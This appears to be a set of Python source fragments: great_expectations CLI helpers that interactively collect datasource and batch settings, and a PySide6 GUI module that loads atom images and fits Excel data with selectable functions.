def __str__(self):
return str(self.data)
def apply(self, func, key=None, **kwargs):
self.del_cache()
if key is not None:
for event, value in zip(self, list(func)):
event[key] = value
elif isinstance(func, str):
for event in self:
foo = getattr(event, func, | |
<reponame>svenhofstede/great_expectations
import logging
import os
import sys
import uuid
import click
from great_expectations import exceptions as ge_exceptions
from great_expectations.cli import toolkit
from great_expectations.cli.pretty_printing import cli_message
from great_expectations.core import ExpectationSuite
from great_expectations.datasource import (
PandasDatasource,
SparkDFDatasource,
SqlAlchemyDatasource,
)
from great_expectations.datasource.batch_kwargs_generator import (
TableBatchKwargsGenerator,
)
from great_expectations.exceptions import BatchKwargsError
from great_expectations.validator.validator import BridgeValidator
logger = logging.getLogger(__name__)
try:
import sqlalchemy
except ImportError:
logger.debug(
"Unable to load SqlAlchemy context; install optional sqlalchemy dependency for support"
)
sqlalchemy = None
# TODO consolidate all the myriad CLI tests into this
def select_batch_kwargs_generator(
context, datasource_name, available_data_assets_dict=None
):
msg_prompt_select_generator = "Select batch kwarg generator"
if available_data_assets_dict is None:
available_data_assets_dict = context.get_available_data_asset_names(
datasource_names=datasource_name
)
available_data_asset_names_by_generator = {}
for key, value in available_data_assets_dict[datasource_name].items():
if len(value["names"]) > 0:
available_data_asset_names_by_generator[key] = value["names"]
if len(available_data_asset_names_by_generator.keys()) == 0:
return None
elif len(available_data_asset_names_by_generator.keys()) == 1:
return list(available_data_asset_names_by_generator.keys())[0]
else: # multiple batch_kwargs_generators
generator_names = list(available_data_asset_names_by_generator.keys())
choices = "\n".join(
[
" {}. {}".format(i, generator_name)
for i, generator_name in enumerate(generator_names, 1)
]
)
option_selection = click.prompt(
msg_prompt_select_generator + "\n" + choices,
type=click.Choice(
[str(i) for i, generator_name in enumerate(generator_names, 1)]
),
show_choices=False,
)
batch_kwargs_generator_name = generator_names[int(option_selection) - 1]
return batch_kwargs_generator_name
# TODO this method needs testing
# TODO this method has different numbers of returned objects
def get_batch_kwargs(
context,
datasource_name=None,
batch_kwargs_generator_name=None,
data_asset_name=None,
additional_batch_kwargs=None,
):
"""
This method manages the interaction with user necessary to obtain batch_kwargs for a batch of a data asset.
In order to get batch_kwargs this method needs datasource_name, batch_kwargs_generator_name and data_asset_name
to combine them into a fully qualified data asset identifier(datasource_name/batch_kwargs_generator_name/data_asset_name).
All three arguments are optional. If they are present, the method uses their values. Otherwise, the method
prompts user to enter them interactively. Since it is possible for any of these three components to be
passed to this method as empty values and to get their values after interacting with user, this method
returns these components' values in case they changed.
If the datasource has batch_kwargs_generators that can list available data asset names, the method lets user choose a name
from that list (note: if there are multiple batch_kwargs_generators, user has to choose one first). If a name known to
the chosen batch_kwargs_generator is selected, the batch_kwargs_generators will be able to yield batch_kwargs. The method also gives user
an alternative to selecting the data asset name from the batch_kwargs_generators's list - user can type in a name for their
data asset. In this case a passthrough batch kwargs batch_kwargs_generators will be used to construct a fully qualified data asset
identifier (note: if the datasource has no passthrough batch_kwargs_generators configured, the method will exist with a failure).
Since no batch_kwargs_generators can yield batch_kwargs for this data asset name, the method prompts user to specify batch_kwargs
by choosing a file (if the datasource is pandas or spark) or by writing a SQL query (if the datasource points
to a database).
:param context:
:param datasource_name:
:param batch_kwargs_generator_name:
:param data_asset_name:
:param additional_batch_kwargs:
:return: a tuple: (datasource_name, batch_kwargs_generator_name, data_asset_name, batch_kwargs). The components
of the tuple were passed into the methods as optional arguments, but their values might
have changed after this method's execution. If the returned batch_kwargs is None, it means
that the batch_kwargs_generator will know to yield batch_kwargs when called.
"""
try:
available_data_assets_dict = context.get_available_data_asset_names(
datasource_names=datasource_name
)
except ValueError:
# the datasource has no batch_kwargs_generators
available_data_assets_dict = {datasource_name: {}}
data_source = toolkit.select_datasource(context, datasource_name=datasource_name)
datasource_name = data_source.name
if batch_kwargs_generator_name is None:
batch_kwargs_generator_name = select_batch_kwargs_generator(
context,
datasource_name,
available_data_assets_dict=available_data_assets_dict,
)
# if the user provided us with the batch kwargs generator name and the data asset, we have everything we need -
# let's ask the generator to build batch kwargs for this asset - we are done.
if batch_kwargs_generator_name is not None and data_asset_name is not None:
generator = data_source.get_batch_kwargs_generator(batch_kwargs_generator_name)
batch_kwargs = generator.build_batch_kwargs(
data_asset_name, **additional_batch_kwargs
)
return batch_kwargs
if isinstance(
context.get_datasource(datasource_name), (PandasDatasource, SparkDFDatasource)
):
(
data_asset_name,
batch_kwargs,
) = _get_batch_kwargs_from_generator_or_from_file_path(
context,
datasource_name,
batch_kwargs_generator_name=batch_kwargs_generator_name,
)
elif isinstance(context.get_datasource(datasource_name), SqlAlchemyDatasource):
data_asset_name, batch_kwargs = _get_batch_kwargs_for_sqlalchemy_datasource(
context, datasource_name, additional_batch_kwargs=additional_batch_kwargs
)
else:
raise ge_exceptions.DataContextError(
"Datasource {:s} is expected to be a PandasDatasource or SparkDFDatasource, but is {:s}".format(
datasource_name, str(type(context.get_datasource(datasource_name)))
)
)
return (datasource_name, batch_kwargs_generator_name, data_asset_name, batch_kwargs)
def _get_batch_kwargs_from_generator_or_from_file_path(
context,
datasource_name,
batch_kwargs_generator_name=None,
additional_batch_kwargs=None,
):
if additional_batch_kwargs is None:
additional_batch_kwargs = {}
msg_prompt_generator_or_file_path = """
Would you like to:
1. choose from a list of data assets in this datasource
2. enter the path of a data file
"""
msg_prompt_file_path = """
Enter the path of a data file (relative or absolute, s3a:// and gs:// paths are ok too)
"""
msg_prompt_enter_data_asset_name = "\nWhich data would you like to use?\n"
msg_prompt_enter_data_asset_name_suffix = (
" Don't see the name of the data asset in the list above? Just type it\n"
)
msg_prompt_file_type = """
We could not determine the format of the file. What is it?
1. CSV
2. Parquet
3. Excel
4. JSON
"""
reader_method_file_extensions = {
"1": "csv",
"2": "parquet",
"3": "xlsx",
"4": "json",
}
data_asset_name = None
datasource = context.get_datasource(datasource_name)
if batch_kwargs_generator_name is not None:
generator = datasource.get_batch_kwargs_generator(batch_kwargs_generator_name)
option_selection = click.prompt(
msg_prompt_generator_or_file_path,
type=click.Choice(["1", "2"]),
show_choices=False,
)
if option_selection == "1":
available_data_asset_names = sorted(
generator.get_available_data_asset_names()["names"], key=lambda x: x[0]
)
available_data_asset_names_str = [
"{} ({})".format(name[0], name[1])
for name in available_data_asset_names
]
data_asset_names_to_display = available_data_asset_names_str[:50]
choices = "\n".join(
[
" {}. {}".format(i, name)
for i, name in enumerate(data_asset_names_to_display, 1)
]
)
prompt = (
msg_prompt_enter_data_asset_name
+ choices
+ "\n"
+ msg_prompt_enter_data_asset_name_suffix.format(
len(data_asset_names_to_display)
)
)
data_asset_name_selection = click.prompt(prompt, show_default=False)
data_asset_name_selection = data_asset_name_selection.strip()
try:
data_asset_index = int(data_asset_name_selection) - 1
try:
data_asset_name = [name[0] for name in available_data_asset_names][
data_asset_index
]
except IndexError:
pass
except ValueError:
data_asset_name = data_asset_name_selection
batch_kwargs = generator.build_batch_kwargs(
data_asset_name, **additional_batch_kwargs
)
return (data_asset_name, batch_kwargs)
# No generator name was passed or the user chose to enter a file path
# We should allow a directory for Spark, but not for Pandas
dir_okay = isinstance(datasource, SparkDFDatasource)
path = None
while True:
# do not use Click to check if the file exists - the get_batch
# logic will check this
path = click.prompt(
msg_prompt_file_path,
type=click.Path(dir_okay=dir_okay),
default=path,
)
if not path.startswith("gs:") and not path.startswith("s3"):
path = os.path.abspath(path)
batch_kwargs = {"path": path, "datasource": datasource_name}
reader_method = None
try:
reader_method = datasource.guess_reader_method_from_path(path)[
"reader_method"
]
except BatchKwargsError:
pass
if reader_method is None:
while True:
option_selection = click.prompt(
msg_prompt_file_type,
type=click.Choice(["1", "2", "3", "4"]),
show_choices=False,
)
try:
reader_method = datasource.guess_reader_method_from_path(
path + "." + reader_method_file_extensions[option_selection]
)["reader_method"]
except BatchKwargsError:
pass
if reader_method is not None:
batch_kwargs["reader_method"] = reader_method
if (
isinstance(datasource, SparkDFDatasource)
and reader_method == "csv"
):
header_row = click.confirm(
"\nDoes this file contain a header row?", default=True
)
batch_kwargs["reader_options"] = {"header": header_row}
batch = datasource.get_batch(batch_kwargs=batch_kwargs)
break
else:
try:
batch_kwargs["reader_method"] = reader_method
if isinstance(datasource, SparkDFDatasource) and reader_method == "csv":
header_row = click.confirm(
"\nDoes this file contain a header row?", default=True
)
batch_kwargs["reader_options"] = {"header": header_row}
batch = datasource.get_batch(batch_kwargs=batch_kwargs)
break
except Exception as e:
file_load_error_message = """
<red>Cannot load file.</red>
- Please check the file and try again or select a different data file.
- Error: {0:s}"""
cli_message(file_load_error_message.format(str(e)))
if not click.confirm("\nTry again?", default=True):
cli_message(
"""
We have saved your setup progress. When you are ready, run great_expectations init to continue.
"""
)
sys.exit(1)
if data_asset_name is None and batch_kwargs.get("path"):
try:
# Try guessing a filename
filename = os.path.split(batch_kwargs.get("path"))[1]
# Take all but the last part after the period
filename = ".".join(filename.split(".")[:-1])
data_asset_name = filename
except (OSError, IndexError):
pass
batch_kwargs["data_asset_name"] = data_asset_name
return (data_asset_name, batch_kwargs)
def _get_default_schema(datasource):
inspector = sqlalchemy.inspect(datasource.engine)
return inspector.default_schema_name
def _get_batch_kwargs_for_sqlalchemy_datasource(
context, datasource_name, additional_batch_kwargs=None
):
data_asset_name = None
sql_query = None
datasource = context.get_datasource(datasource_name)
msg_prompt_how_to_connect_to_data = """
You have selected a datasource that is a SQL database. How would you like to specify the data?
1. Enter a table name and schema
2. Enter a custom SQL query
3. List all tables in the database (this may take a very long time)
"""
default_schema = _get_default_schema(datasource)
temp_generator = TableBatchKwargsGenerator(name="temp", datasource=datasource)
while data_asset_name is None:
single_or_multiple_data_asset_selection = click.prompt(
msg_prompt_how_to_connect_to_data,
type=click.Choice(["1", "2", "3"]),
show_choices=False,
)
if single_or_multiple_data_asset_selection == "1": # name the table and schema
schema_name = click.prompt(
"Please provide the schema name of the table (this is optional)",
default=default_schema,
)
table_name = click.prompt(
"Please provide the table name (this is required)"
| |
# IMPORT PACKAGES FOR ANALYSING
# ///////////////////////////////////////////////////////////////
import string
import pandas as pd
from PIL import Image
import numpy as np
import os
from PySide6.QtWidgets import QFileDialog
from iminuit import Minuit
import matplotlib.pyplot as plt
from matplotlib.offsetbox import AnchoredText
from gui.uis.api.atom import Atom
from gui.uis.api.analysis import Analysis
from gui.uis.windows.atom_window import UI_AtomWindow
from gui.uis.windows.analysis_window import UI_AnalysisWindow
from gui.uis.api.fitting import Fit
from gui.widgets import *
from qt_core import *
# ATOM PAGE FUNCTIONALITY
def open_dialog_box_atom(atom: Atom, ui_atom: UI_AtomWindow, switch: string) -> None:
filename = QFileDialog.getOpenFileName()
if switch == "no_cloud":
atom.setNoCloudPath(filename[0])
ui_atom.load_pages.lineEdit_without_cloud_path.setText(filename[0])
print(atom.getNoCloudPath())
elif switch == "with_cloud":
atom.setCloudPath(filename[0])
ui_atom.load_pages.lineEdit_with_cloud_path.setText(filename[0])
print(atom.getCloudPath())
def calculate_atom_number(atom: Atom, ui_atom: UI_AtomWindow) -> None:
if atom.clearToLoad():
atom_number = atom.calculateAtomNumber()
print(atom_number)
ui_atom.load_pages.label_atom_number.setText(str(atom_number))
else:
error = QMessageBox()
error.setWindowTitle("Error")
print("Can not Calculate! Please load images first")
error.setText("Please load images first")
error.exec()
def load_image(atom: Atom, ui_atom: UI_AtomWindow) -> None:
error = QMessageBox()
error.setWindowTitle("Error")
error.setIcon(QMessageBox.Critical)
if checkAndSet(atom, error):
checkAndLoad(atom, error, ui_atom)
def checkAndSet(atom: Atom, error: QMessageBox) -> bool:
condition = bool(True)
if not atom.clearToSet():
print("Can not set images! Please check images path")
error.setText("Please check images path")
error.exec()
condition = bool(False)
elif atom.checkImageFormatJPG():
atom.setImageJPG()
elif atom.checkImageFormatBIN():
atom.setImageBIN()
else:
error.setText("images are not in format")
error.exec()
print("At least one of the images is not in jpg or bin format")
condition = bool(False)
return condition
def checkAndLoad(atom: Atom, error: QMessageBox, ui_atom: UI_AtomWindow) -> None:
if not atom.clearToLoad():
print("Can not load images! Please check images numpy arrays")
error.setText("Please check images numpy arrays")
error.exec()
else:
loaded_image = atom.loadImage(ui_atom.cloud_combo.currentIndex())
if loaded_image is None:
print("ComboBox index is not Valid")
else:
ui_atom.load_pages.ImageView_Atom.setImage(loaded_image)
def clear_image(atom: Atom, ui_atom: UI_AtomWindow) -> None:
atom.clearImage()
ui_atom.load_pages.ImageView_Atom.clear()
ui_atom.load_pages.label_atom_number.setText(str(0))
ui_atom.load_pages.label_cloud_temperature.setText(str(0))
ui_atom.load_pages.lineEdit_with_cloud_path.clear()
ui_atom.load_pages.lineEdit_without_cloud_path.clear()
def combo_current_change(atom: Atom, ui_atom: UI_AtomWindow, ind: int) -> None:
loaded_image = atom.loadImage(ind)
if loaded_image is not None:
ui_atom.load_pages.ImageView_Atom.setImage(loaded_image)
else:
print("ComboBox index is not Valid")
# ANALYSIS PAGE FUNCTIONALITY
def open_dialog_box_analysis(analysis: Analysis, switch: string, ui_analysis: UI_AnalysisWindow) -> None:
error = QMessageBox()
error.setWindowTitle("Error")
error.setIcon(QMessageBox.Critical)
filename = QFileDialog.getOpenFileName()
if switch == "excel_file":
analysis.setExcelPath(filename[0])
print(analysis.getExcelPath())
if not analysis.checkExcelFormat():
print("file is not in excel format!")
error.setText("File must be in xlsx format")
error.exec()
else:
ui_analysis.load_pages.lineEdit_analysis_excel_name.setText(analysis.getExcelPath())
excel_file = pd.ExcelFile(analysis.getExcelPath())
ui_analysis.load_pages.comboBox_analysis_excel_sheet_names.addItems(excel_file.sheet_names)
print("Sheet names: ", excel_file.sheet_names)
def send_excel_parameters(analysis: Analysis, ui_analysis: UI_AnalysisWindow) -> None:
error = QMessageBox()
error.setWindowTitle("Error")
error.setIcon(QMessageBox.Critical)
# Collecting Excel's groupbox parameters into a boolean list
# List represent the result of each method
bool_list = [analysis.setSheetName(ui_analysis.load_pages.comboBox_analysis_excel_sheet_names.currentText()),
analysis.setExcelPath(ui_analysis.load_pages.lineEdit_analysis_excel_name.text())]
# All methods succeed
if all(bool_list):
if not analysis.checkExcelFormat():
print("file is not in excel format!")
error.setText("File must be in xlsx format")
error.exec()
else:
if analysis.readExcel(): # Create data frame related excel path
print("Created Data Frame from excel path")
if analysis.initializeAxis():
initialize_excel_axis(ui_analysis.analysis.getExcelAxis(), ui_analysis)
print("Axis initialization succeed")
else:
print("Missing excel parameters information!")
error.setText("Missing data, please check that all parameters are loaded")
error.exec()
def fun_fit_changed(analysis: Analysis, ui_analysis: UI_AnalysisWindow, ind: int):
# Set the fit function label to mach the new function that chosen
ui_analysis.load_pages.label_analysis_fit_function.setText(analysis.fun_texts.fun_non_latex_texts_array[ind])
# number of parameters of new fit function
new_num_of_params = analysis.fun_fits.number_of_params[ind]
# Check if the new fit function has the same amount of parameters
if new_num_of_params == analysis.fit.get_func_par_num():
return
else:
analysis.fit.set_func_par_num(new_num_of_params)
refresh_params_data_enable(ui_analysis, new_num_of_params)
def initialize_excel_axis(axis: np.ndarray, ui_analysis: UI_AnalysisWindow) -> None:
ui_analysis.load_pages.comboBox_analysis_x_axis.clear()
ui_analysis.load_pages.comboBox_analysis_y_axis.clear()
ui_analysis.load_pages.comboBox_analysis_x_error.clear()
ui_analysis.load_pages.comboBox_analysis_y_error.clear()
print("clean old axis")
ui_analysis.load_pages.comboBox_analysis_x_axis.addItems(axis)
ui_analysis.load_pages.comboBox_analysis_y_axis.addItems(axis)
ui_analysis.load_pages.comboBox_analysis_x_error.addItems(np.append(axis, "None"))
ui_analysis.load_pages.comboBox_analysis_y_error.addItems(np.append(axis, "None"))
def plot_analysis_data(analysis: Analysis, ui_analysis: UI_AnalysisWindow) -> None:
set_data(analysis, ui_analysis)
set_data_2_graph(analysis, ui_analysis)
def optimize_analysis_data(analysis: Analysis, ui_analysis: UI_AnalysisWindow) -> None:
ui_analysis.analysis.fit = Fit()
set_data(analysis, ui_analysis)
# Initialize parameters with user's data
set_parameters(analysis, ui_analysis)
# Activate optimization
set_opt_and_plot(analysis, ui_analysis)
# Update optimized parameters
update_parameters(analysis, ui_analysis)
def get_axis_labels(ui_analysis: UI_AnalysisWindow) -> np.array:
x_name = ui_analysis.load_pages.comboBox_analysis_x_axis.currentText()
y_name = ui_analysis.load_pages.comboBox_analysis_y_axis.currentText()
dx_name = ui_analysis.load_pages.comboBox_analysis_x_error.currentText()
dy_name = ui_analysis.load_pages.comboBox_analysis_y_error.currentText()
return [x_name, y_name, dx_name, dy_name]
def set_data(analysis: Analysis, ui_analysis: UI_AnalysisWindow):
df: pd.DataFrame = analysis.getDataFrame()
labels = get_axis_labels(ui_analysis)
x = df[labels[0]].values
y = df[labels[1]].values
if labels[2] == "None":
dx = None
else:
dx = df[labels[2]].values
if labels[3] == "None":
dy = None
else:
dy = df[labels[3]].values
ui_analysis.analysis.setFitData(x, y, dx, dy)
def set_opt_and_plot(analysis: Analysis, ui_analysis: UI_AnalysisWindow):
# Set fit function index as user marked
fun_ind = ui_analysis.load_pages.comboBox_analysis_fit_function.currentIndex()
# Set the wanted fit function
print(analysis.fun_texts.fun_texts_array[fun_ind])
analysis.fit.set_function(analysis.fun_fits.fun_fit_array[fun_ind])
# Keep the number of parameters in the fit function
analysis.fit.set_func_par_num(analysis.fun_fits.number_of_params[fun_ind])
# Activate optimization with the current cost function
if analysis.fit.has_uncertainty():
opt: Minuit = analysis.fit.optimize()
ui_analysis.load_pages.lineEdit_analysis_chi2Ndof.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_chi2Ndof.setText(str(analysis.fit.get_chi_ndof()))
update_parameters_error(analysis, ui_analysis)
# Plot data on a graph
else:
analysis.fit.opt_by_scipy()
ui_analysis.load_pages.lineEdit_analysis_chi2Ndof.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_chi2Ndof.setText("None")
# Plot data on a graph
plot_opt_func(analysis, ui_analysis)
def set_parameters(analysis: Analysis, ui_analysis: UI_AnalysisWindow):
param_num = analysis.fit.get_func_par_num()
analysis.fit.set_a_initial(float(ui_analysis.load_pages.lineEdit_analysis_initial_a.text()))
analysis.fit.set_a_limits(float(ui_analysis.load_pages.lineEdit_analysis_s_limit_a.text()),
float(ui_analysis.load_pages.lineEdit_analysis_f_limit_a.text()))
if param_num > 1:
analysis.fit.set_b_initial(float(ui_analysis.load_pages.lineEdit_analysis_initial_b.text()))
analysis.fit.set_b_limits(float(ui_analysis.load_pages.lineEdit_analysis_s_limit_b.text()),
float(ui_analysis.load_pages.lineEdit_analysis_f_limit_b.text()))
if param_num > 2:
analysis.fit.set_c_initial(float(ui_analysis.load_pages.lineEdit_analysis_initial_c.text()))
analysis.fit.set_c_limits(float(ui_analysis.load_pages.lineEdit_analysis_s_limit_c.text()),
float(ui_analysis.load_pages.lineEdit_analysis_f_limit_c.text()))
if param_num > 3:
analysis.fit.set_d_initial(float(ui_analysis.load_pages.lineEdit_analysis_initial_d.text()))
analysis.fit.set_d_limits(float(ui_analysis.load_pages.lineEdit_analysis_s_limit_d.text()),
float(ui_analysis.load_pages.lineEdit_analysis_f_limit_d.text()))
def refresh_params_data_enable(ui_analysis: UI_AnalysisWindow, params_num: int):
if params_num == 1:
ui_analysis.load_pages.lineEdit_analysis_initial_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_b.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_s_limit_b.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_f_limit_b.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_param_b.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_err_b.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_initial_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_s_limit_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_f_limit_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_param_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_err_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_initial_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_s_limit_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_f_limit_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_param_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_err_d.setEnabled(False)
refresh_param_data_text(ui_analysis,
[["0", "-1000", "1000"], ["None", "None", "None"], ["None", "None", "None"],
["None", "None", "None"]])
elif params_num == 2:
ui_analysis.load_pages.lineEdit_analysis_initial_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_s_limit_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_f_limit_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_param_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_err_c.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_initial_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_s_limit_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_f_limit_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_param_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_err_d.setEnabled(False)
# Check if the selected fit function is Normalized Gaussian
if ui_analysis.load_pages.comboBox_analysis_fit_function.currentText() == "Normalized Gaussian":
refresh_param_data_text(ui_analysis,
[["1", "-1000", "1000"], ["1", "-1000", "1000"], ["None", "None", "None"],
["None", "None", "None"]])
else:
refresh_param_data_text(ui_analysis,
[["0", "-1000", "1000"], ["0", "-1000", "1000"], ["None", "None", "None"],
["None", "None", "None"]])
elif params_num == 3:
ui_analysis.load_pages.lineEdit_analysis_initial_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_s_limit_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_f_limit_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_param_d.setEnabled(False)
ui_analysis.load_pages.lineEdit_analysis_err_d.setEnabled(False)
# Check if the selected fit function is Gaussian
if ui_analysis.load_pages.comboBox_analysis_fit_function.currentText() == "Gaussian":
refresh_param_data_text(ui_analysis,
[["1", "-1000", "1000"], ["1", "-1000", "1000"], ["1", "-1000", "1000"],
["None", "None", "None"]])
else:
refresh_param_data_text(ui_analysis,
[["0", "-1000", "1000"], ["0", "-1000", "1000"], ["0", "-1000", "1000"],
["None", "None", "None"]])
elif params_num == 4:
ui_analysis.load_pages.lineEdit_analysis_initial_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_a.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_b.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_c.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_initial_d.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_s_limit_d.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_f_limit_d.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_param_d.setEnabled(True)
ui_analysis.load_pages.lineEdit_analysis_err_d.setEnabled(True)
# Check if the selected fit function is offset Gaussian
if ui_analysis.load_pages.comboBox_analysis_fit_function.currentText() == "Offset Gaussian":
refresh_param_data_text(ui_analysis,
[["1", "-1000", "1000"], ["1", "-1000", "1000"], ["1", "-1000", "1000"],
["0", "-1000", "1000"]])
else:
refresh_param_data_text(ui_analysis,
[["0", "-1000", "1000"], ["0", "-1000", "1000"], ["0", "-1000", "1000"],
["0", "-1000", "1000"]])
def refresh_param_data_text(ui_analysis: UI_AnalysisWindow, text_arr):
ui_analysis.load_pages.lineEdit_analysis_initial_a.setText(text_arr[0][0])
ui_analysis.load_pages.lineEdit_analysis_s_limit_a.setText(text_arr[0][1])
ui_analysis.load_pages.lineEdit_analysis_f_limit_a.setText(text_arr[0][2])
ui_analysis.load_pages.lineEdit_analysis_initial_b.setText(text_arr[1][0])
ui_analysis.load_pages.lineEdit_analysis_s_limit_b.setText(text_arr[1][1])
ui_analysis.load_pages.lineEdit_analysis_f_limit_b.setText(text_arr[1][2])
ui_analysis.load_pages.lineEdit_analysis_initial_c.setText(text_arr[2][0])
ui_analysis.load_pages.lineEdit_analysis_s_limit_c.setText(text_arr[2][1])
ui_analysis.load_pages.lineEdit_analysis_f_limit_c.setText(text_arr[2][2])
ui_analysis.load_pages.lineEdit_analysis_initial_d.setText(text_arr[3][0])
ui_analysis.load_pages.lineEdit_analysis_s_limit_d.setText(text_arr[3][1])
ui_analysis.load_pages.lineEdit_analysis_f_limit_d.setText(text_arr[3][2])
def update_parameters(analysis: Analysis, ui_analysis: UI_AnalysisWindow):
num_of_params = analysis.fit.get_func_par_num()
if num_of_params > 0:
ui_analysis.load_pages.lineEdit_analysis_param_a.setText(str(analysis.fit.get_a_parameter()))
if num_of_params > 1:
ui_analysis.load_pages.lineEdit_analysis_param_b.setText(str(analysis.fit.get_b_parameter()))
if num_of_params > 2:
ui_analysis.load_pages.lineEdit_analysis_param_c.setText(str(analysis.fit.get_c_parameter()))
if num_of_params > 3:
ui_analysis.load_pages.lineEdit_analysis_param_d.setText(str(analysis.fit.get_d_parameter()))
def update_parameters_error(analysis: Analysis, ui_analysis: UI_AnalysisWindow):
num_of_params = analysis.fit.get_func_par_num()
if num_of_params > 0:
ui_analysis.load_pages.lineEdit_analysis_err_a.setText(str(analysis.fit.get_a_err_parameter()))
if num_of_params > 1:
ui_analysis.load_pages.lineEdit_analysis_err_b.setText(str(analysis.fit.get_b_err_parameter()))
if num_of_params > 2:
ui_analysis.load_pages.lineEdit_analysis_err_c.setText(str(analysis.fit.get_c_err_parameter()))
if num_of_params > 3:
ui_analysis.load_pages.lineEdit_analysis_err_d.setText(str(analysis.fit.get_d_err_parameter()))
# Return an array of two rgb colors, one for plot line and one for plot symbol
def get_graph_colors(ui_analysis: UI_AnalysisWindow) -> np.array:
colors = [(55, 55, 55), "b", "g", "r", "c", "m", "y", "k", "w"]
plot_line_color = colors[ui_analysis.load_pages.comboBox_analysis_plot_line_color.currentIndex()]
plot_symbol_color = colors[ui_analysis.load_pages.comboBox_analysis_plot_symbol_color.currentIndex()]
return [plot_line_color, plot_symbol_color]
def set_data_2_graph(analysis: Analysis, ui_analysis: UI_AnalysisWindow) -> None:
colors = get_graph_colors(ui_analysis)
x = analysis.fit.get_x_array()
y = analysis.fit.get_y_array()
dx = analysis.fit.get_dx_array()
dy = analysis.fit.get_dy_array()
# Add error bar
if dx is not None and dy is not None:
ui_analysis.graph.addItem(
pg.ErrorBarItem(x=x, y=y, top=dy / 2, bottom=dy / 2, left=dx / 2, right=dx / 2, beam=0.5))
elif dy is not None:
ui_analysis.graph.addItem(pg.ErrorBarItem(x=x, y=y, top=dy / 2, bottom=dy / 2, beam=0.5))
ui_analysis.graph.plot(analysis.fit.get_x_array(), analysis.fit.get_y_array(),
